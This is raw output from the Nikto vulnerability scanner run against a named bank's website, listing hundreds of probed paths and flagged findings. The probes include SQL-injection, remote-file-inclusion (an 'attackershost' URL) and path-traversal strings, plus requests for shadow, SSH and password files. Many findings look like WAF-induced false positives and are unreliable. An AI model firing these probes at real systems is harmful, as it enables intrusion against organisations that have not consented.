- Nikto --------------------------------------------------------------------------- + Target IP: 45.60.241.223 + Target Hostname: www.1firstbank.com + Target Port: 80 + Start Time: 2024-11-29 17:39:00 (GMT-5) --------------------------------------------------------------------------- + Server: No banner retrieved + /: Cookie incap_ses_269_2678378 created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + /: Retrieved x-served-by header: cache-lga21920-LGA. + /: Incapsula WAF is in use. See: https://www.sumasoft.com/incapsula-cloud-based-web-application-firewall-waf/ + /: Fastly CDN was identified by the x-timer header. See: https://www.fastly.com/ + /: Uncommon header 'x-iinfo' found, with contents: 9-9251557-9251558 NNNY CT(1 -1 0) RT(1732919940515 0) q(0 0 0 -1) r(0 0) U24. + /: Uncommon header 'x-served-by' found, with contents: cache-lga21920-LGA. + Root page / redirects to: https://www.1firstbank.com/ + No CGI Directories found (use '-C all' to force check all possible dirs) + /subir/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /subir/: This might be interesting. + /sun/: This might be interesting. + /super_stats/access_logs: Web logs are exposed.. + /super_stats/error_logs: Web logs are exposed. + /support/: This might be interesting. + /swf: This might be interesting: Flash files?. + /sys/: This might be interesting. + /system/: This might be interesting. + /tar/: This might be interesting. + /tarjetas/: This might be interesting. + /temp/: This might be interesting. + /template/: This might be interesting: could have sensitive files or system information. + /temporal/: This might be interesting. + /test.htm: This might be interesting. + /test.html: This might be interesting. + /test.txt: This might be interesting. + /test/: This might be interesting. + /testing/: This might be interesting. + /tests/: This might be interesting. + /tmp/: This might be interesting. + /tools/: This might be interesting. + /tpv/: This might be interesting. + /trabajo/: This might be interesting. + /trafficlog/: This might be interesting. + /transito/: This might be interesting. + /tree/: This might be interesting. + /trees/: This might be interesting. + /updates/: This might be interesting. + /user/: This might be interesting. + /users/: This might be interesting. + /users/scripts/submit.cgi: This might be interesting. + /ustats/: This might be interesting. + /usuario/: This might be interesting. + /usuarios/: This might be interesting. + /vfs/: This might be interesting. + /w3perl/admin: This might be interesting. + /warez/: This might be interesting. + /web/: This might be interesting. + /web800fo/: This might be interesting. + /webaccess.htm: This might be interesting. + /webaccess/access-options.txt: This might be interesting. + /webadmin/: This might be interesting: probably HostingController, www.hostingcontroller.com. + /webboard/: This might be interesting. + /webcart-lite/: This might be interesting. + /webcart/: This might be interesting. + /webdata/: This might be interesting. + /weblog/: This might be interesting. + /weblogs/: This might be interesting. + /webmaster_logs/: This might be interesting. + /WebShop/: This might be interesting. + /WebShop/logs/cc.txt: Seen in carding forums. See: https://packetstormsecurity.com/files/32406/xmas.txt.html + /WebShop/templates/cc.txt: Seen in carding forums. See: https://packetstormsecurity.com/files/32406/xmas.txt.html + /website/: This might be interesting. + /webstats/: This might be interesting. + /WebTrend/: This might be interesting. + /Web_store/: This might be interesting. + /windows/: This might be interesting. + /word/: This might be interesting. + /work/: This might be interesting. + /wstats/: This might be interesting. + /wusage/: This might be interesting. + /www-sql/: This might be interesting. + /www/: This might be interesting. + /wwwboard/wwwboard.cgi: This might be interesting. + /wwwboard/wwwboard.pl: This might be interesting. + /wwwjoin/: This might be interesting. + /wwwlog/: This might be interesting. + /wwwstats.html: This might be interesting. + /wwwstats/: This might be interesting. + /wwwthreads/3tvars.pm: This might be interesting. + /wwwthreads/w3tvars.pm: This might be interesting. + /zipfiles/: This might be interesting. + /adsamples/config/site.csc: Contains SQL username/password. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1520 + /advworks/equipment/catalog_type.asp: Seen in carding forums. See: https://packetstormsecurity.com/files/32406/xmas.txt.html + /carbo.dll: This might be interesting. + /clocktower/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /market/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /mspress30/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /sam: This might be interesting. + /sam.bin: This might be interesting. + /sam._: This might be interesting. + /samples/search/queryhit.htm: This might be interesting. + /scripts/counter.exe: This might be interesting. + /scripts/cphost.dll: cphost.dll may have a DoS and a traversal issue. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1769 + /scripts/fpadmcgi.exe: This might be interesting. + /scripts/postinfo.asp: This might be interesting. + /scripts/samples/ctguestb.idc: This might be interesting. + /scripts/samples/search/webhits.exe: This might be interesting. + /site/iissamples/: This might be interesting. + /vc30/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /_mem_bin/: This might be interesting: user login. + /_mem_bin/FormsLogin.asp: This might be interesting: user login. + /perl/files.pl: This might be interesting. + /perl5/files.pl: This might be interesting. + /scripts/convert.bas: This might be interesting. + /owa_util%2esignature: This might be interesting. + /cgi-dos/args.bat: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /custdata/: This may be COWS (CGI Online Worldweb Shopping), and may leak customer data. + /hostingcontroller/: This might be interesting: probably HostingController, www.hostingcontroller.com. + /databases/: Databases directy found. + /img-sys/: Default image directory should not allow directory listing. + /java-sys/: Default Java directory should not allow directory listing. + /javadoc/: Documentation...?. + /log/: Ahh...log information...fun!. + /manager/: May be a web server or site manager. + /manual/: Web server manual found. + /exchange/: This might be interesting: Outlook/Exchange OWA. + /finance.xls: Finance spreadsheet?. + /finances.xls: Finance spreadsheet?. + /abonnement.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /acartpath/signin.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /add_acl: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/auth.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cfg/configscreen.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cfg/configsite.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cfg/configsql.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cfg/configtache.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cms/htmltags.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/credit_card_info.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/exec.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/modules/cache.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/objects.inc.php4: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/script.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/settings.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/templates/header.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/upload.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin_t/include/aff_liste_langue.php: This might be interesting: has been seen in web logs from an unknown scanner. + /adv/gm001-mc/: This might be interesting: has been seen in web logs from an unknown scanner. + /aff_news.php: This might be interesting: has been seen in web logs from an unknown scanner. + /approval/ts_app.htm: This might be interesting: has been seen in web logs from an unknown scanner. + /archive.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /archive_forum.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /ashnews.php: This might be interesting: has been seen in web logs from an unknown scanner. + /auth.inc.php: This might be interesting: has been seen in web logs from an unknown scanner. + /b2-tools/gm-2-b2.php: This might be interesting: has been seen in web logs from an unknown scanner. + /bandwidth/index.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /basilix.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting: has been seen in web logs from an unknown scanner. + /bin/common/user_update_passwd.pl: This might be interesting: has been seen in web logs from an unknown scanner. + /biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /board/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /board/philboard_admin.asp+: This might be interesting: has been seen in web logs from an unknown scanner. + /bugtest+/+: This might be interesting: has been seen in web logs from an unknown scanner. + /caupo/admin/admin_workspace.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ccbill/whereami.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /chat_dir/register.php: This might be interesting: has been seen in web logs from an unknown scanner. + /checkout_payment.php: This might be interesting: has been seen in web logs from an unknown scanner. + /communique.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /community/forumdisplay.php: This might be interesting: has been seen in web logs from an unknown scanner. + /community/index.php?analized=anything: This might be interesting: has been seen in web logs from an unknown scanner. + /community/member.php: This might be interesting: has been seen in web logs from an unknown scanner. + /compte.php: This might be interesting: has been seen in web logs from an unknown scanner. + /config/html/cnf_gi.htm: This might be interesting: has been seen in web logs from an unknown scanner. + /convert-date.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cp/rac/nsManager.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /csPassword.cgi?command=remove%20: This might be interesting: has been seen in web logs from an unknown scanner. + /cutenews/comments.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cutenews/search.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cutenews/shownews.php: This might be interesting: has been seen in web logs from an unknown scanner. + /Data/settings.xml+: This might be interesting: has been seen in web logs from an unknown scanner. + /database/metacart.mdb+: This might be interesting: has been seen in web logs from an unknown scanner. + /db.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dbabble: This might be interesting: has been seen in web logs from an unknown scanner. + /dcp/advertiser.php: This might be interesting: has been seen in web logs from an unknown scanner. + /defines.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dltclnt.php: This might be interesting: has been seen in web logs from an unknown scanner. + /doc/admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /docs/NED: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/files/index_table.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/projects/addedit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/projects/view.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/projects/vw_files.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/tasks/addedit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/tasks/viewgantt.php: This might be interesting: has been seen in web logs from an unknown scanner. + /do_map: This might be interesting: has been seen in web logs from an unknown scanner. + /do_subscribe: This might be interesting: has been seen in web logs from an unknown scanner. + /email.php: This might be interesting: has been seen in web logs from an unknown scanner. + /emml_email_func.php: This might be interesting: has been seen in web logs from an unknown scanner. + /emumail.cgi?type=.%00: This might be interesting: has been seen in web logs from an unknown scanner. + /entete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /enteteacceuil.php: This might be interesting: has been seen in web logs from an unknown scanner. + /etc/shadow+: This might be interesting: has been seen in web logs from an unknown scanner. + /eventcal2.php.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ez2000/ezadmin.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /ez2000/ezboard.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /ez2000/ezman.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /faqman/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /filemanager/index.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /filemgmt/brokenfile.php: This might be interesting: has been seen in web logs from an unknown scanner. + /filemgmt/singlefile.php: This might be interesting: has been seen in web logs from an unknown scanner. + /filemgmt/viewcat.php: This might be interesting: has been seen in web logs from an unknown scanner. + /filemgmt/visit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /foro/YaBB.pl: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/mainfile.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/member.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/newreply.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/newthread.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/viewtopic.php: phpBB found. + /forum_arc.asp?n=268: This might be interesting: has been seen in web logs from an unknown scanner. + /forum_professionnel.asp?n=100: This might be interesting: has been seen in web logs from an unknown scanner. + /functions.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /globals.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /globals.pl: This might be interesting: has been seen in web logs from an unknown scanner. + /Gozila.cgi: Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi. See: https://seclists.org/fulldisclosure/2004/Jun/49 + /homebet/homebet.dll?form=menu&option=menu-signin: This might be interesting: has been seen in web logs from an unknown scanner. + /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /include/customize.php: This might be interesting: has been seen in web logs from an unknown scanner. + /include/help.php: This might be interesting: has been seen in web logs from an unknown scanner. + /includes/footer.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /includes/header.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/contact/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/faq/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/gen/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/services/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /instaboard/index.cfm: This might be interesting: has been seen in web logs from an unknown scanner. + /intranet/browse.php: This might be interesting: has been seen in web logs from an unknown scanner. + /invitefriends.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /ipchat.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ixmail_netattach.php: This might be interesting: has been seen in web logs from an unknown scanner. + /jsptest.jsp+: This might be interesting: has been seen in web logs from an unknown scanner. + /kernel/class/delete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /kernel/classes/ezrole.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ldap.search.php3?ldap_serv=nonsense%20: This might be interesting: has been seen in web logs from an unknown scanner. + /livredor/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /login.php3?reason=chpass2%20: This might be interesting: has been seen in web logs from an unknown scanner. + /mail/include.html: This might be interesting: has been seen in web logs from an unknown scanner. + /mail/settings.html: This might be interesting: has been seen in web logs from an unknown scanner. + /mambo/banners.php: This might be interesting: has been seen in web logs from an unknown scanner. + /manage/login.asp+: This might be interesting: has been seen in web logs from an unknown scanner. + /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting: has been seen in web logs from an unknown scanner. + /members/ID.pm: This might be interesting: has been seen in web logs from an unknown scanner. + /members/ID.xbb: This might be interesting: has been seen in web logs from an unknown scanner. + /mod.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modif/delete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modif/ident.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Downloads/voteinclude.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Forums/attachment.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Search/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/in.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/out.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/quit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/users.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Your_Account/navbar.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /moregroupware/modules/webmail2/inc/: This might be interesting: has been seen in web logs from an unknown scanner. + /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /netget?sid=Safety&msg=2002&file=Safety: This might be interesting: has been seen in web logs from an unknown scanner. + /newtopic.php: This might be interesting: has been seen in web logs from an unknown scanner. + /nphp/nphpd.php: This might be interesting: has been seen in web logs from an unknown scanner. + /OpenTopic: This might be interesting: has been seen in web logs from an unknown scanner. + /options.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /oscommerce/default.php: This might be interesting: has been seen in web logs from an unknown scanner. + /parse_xml.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /php/gaestebuch/admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /php/php4ts.dll: This might be interesting: has been seen in web logs from an unknown scanner. + /pks/lookup: This might be interesting: has been seen in web logs from an unknown scanner. + /pm/lib.inc.php: This might be interesting: has been seen in web logs from an unknown scanner. + /poppassd.php3+: This might be interesting: has been seen in web logs from an unknown scanner. + /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /product_info.php: This might be interesting: has been seen in web logs from an unknown scanner. + /prometheus-all/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /protected/: This might be interesting: has been seen in web logs from an unknown scanner. + /protected/secret.html+: This might be interesting: has been seen in web logs from an unknown scanner. + /protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=': This might be interesting: has been seen in web logs from an unknown scanner. + /protection.php: This might be interesting: has been seen in web logs from an unknown scanner. + /pt_config.inc: This might be interesting: has been seen in web logs from an unknown scanner. + /pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting: has been seen in web logs from an unknown scanner. + /pvote/del.php?pollorder=1%20: This might be interesting: has been seen in web logs from an unknown scanner. + /quikmail/nph-emumail.cgi?type=../%00: This might be interesting: has been seen in web logs from an unknown scanner. + /room/save_item.php: This might be interesting: has been seen in web logs from an unknown scanner. + /screen.php: This might be interesting: has been seen in web logs from an unknown scanner. + /scripts/tradecli.dll: This might be interesting: has been seen in web logs from an unknown scanner. + /security/web_access.html: This might be interesting: has been seen in web logs from an unknown scanner. + /sendphoto.php: This might be interesting: has been seen in web logs from an unknown scanner. + /servers/link.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /shop/php_files/site.config.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /shop/search.php: This might be interesting: has been seen in web logs from an unknown scanner. + /shop/show.php: This might be interesting: has been seen in web logs from an unknown scanner. + /Site/biztalkhttpreceive.dll: This might be interesting: has been seen in web logs from an unknown scanner. + /site_searcher.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /spelling.php3+: This might be interesting: has been seen in web logs from an unknown scanner. + /staticpages/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /status.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /supporter/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /supporter/tupdate.php: This might be interesting: has been seen in web logs from an unknown scanner. + /sw000.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /syslog.htm?%20: This might be interesting: has been seen in web logs from an unknown scanner. + /technote/print.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /texis/websearch/phine: This might be interesting: has been seen in web logs from an unknown scanner. + /tinymsg.php: This might be interesting: has been seen in web logs from an unknown scanner. + /topic/entete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /topsitesdir/edit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ttforum/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /tutos/file/file_new.php: This might be interesting: has been seen in web logs from an unknown scanner. + /tutos/file/file_select.php: This might be interesting: has been seen in web logs from an unknown scanner. + /typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cms/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /site/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /typo/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /typo3/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /uifc/MultFileUploadHandler.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /url.jsp: This might be interesting: has been seen in web logs from an unknown scanner. + /useraction.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /utils/sprc.asp+: This might be interesting: has been seen in web logs from an unknown scanner. + /vars.inc+: This might be interesting: has been seen in web logs from an unknown scanner. + /VBZooM/add-subject.php: This might be interesting: has been seen in web logs from an unknown scanner. + /wbboard/profile.php: This might be interesting: has been seen in web logs from an unknown scanner. + /wbboard/reply.php: This might be interesting: has been seen in web logs from an unknown scanner. + /webcalendar/login.php: This might be interesting: has been seen in web logs from an unknown scanner. + /webcalendar/view_m.php: This might be interesting: has been seen in web logs from an unknown scanner. + /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting: has been seen in web logs from an unknown scanner. + /web_app/WEB-INF/webapp.properties: This might be interesting: has been seen in web logs from an unknown scanner. + /XMBforum/buddy.php: This might be interesting: has been seen in web logs from an unknown scanner. + /XMBforum/member.php: This might be interesting: has been seen in web logs from an unknown scanner. + /x_stat_admin.php: This might be interesting: has been seen in web logs from an unknown scanner. + /yabbse/Reminder.php: This might be interesting: has been seen in web logs from an unknown scanner. + /yabbse/Sources/Packages.php: This might be interesting: has been seen in web logs from an unknown scanner. + /zentrack/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /_head.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ows-bin/oaskill.exe?abcde.exe: This might be interesting: has been seen in web logs from an unknown scanner. + /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah: This might be interesting: has been seen in web logs from an unknown scanner. + /database/: Database directory found. + /.wwwacl: Contains authorization information. + /.www_acl: Contains authorization information. + /.access: Contains authorization information. + /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes. + /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to. + /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web. + /.htaccess: Contains configuration and/or authorization information. + /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites. + /.passwd: Contains authorization information. + /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more. + /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol. + /.proclog: User home dir with a Procmail log file. May reveal user mail traffic, directories and more. + /.procmailrc: User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more. + /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web. + /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /jservdocs/: Default Apache JServ docs should be removed. See: CWE-552 + /tomcat-docs/index.html: Default Apache Tomcat documentation found. See: CWE-552 + /akopia/: Akopia is installed. See: CWE-552 + /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field. See: CWE-552 + /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field. See: CWE-552 + /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field. See: CWE-552 + /php/index.php: Monkey Http Daemon default PHP file found. See: CWE-552 + /servlet/Counter: JRun default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers. See: CWE-552 + /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers. See: CWE-552 + /admcgi/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /admcgi/scripts/Fpadmcgi.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /admisapi/fpadmin.htm: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/fpadmin.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/fpadmin.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpadmin.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpcount.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/orders.htm: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/orders.txt: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/register.htm: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/register.txt: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/registrations.txt: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/fpadmin.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_cnf/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_log/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /help/contents.htm: Default Netscape manual found. All default pages should be removed. See: CWE-552 + /help/home.html: Default Netscape manual found. All default pages should be removed. See: CWE-552 + 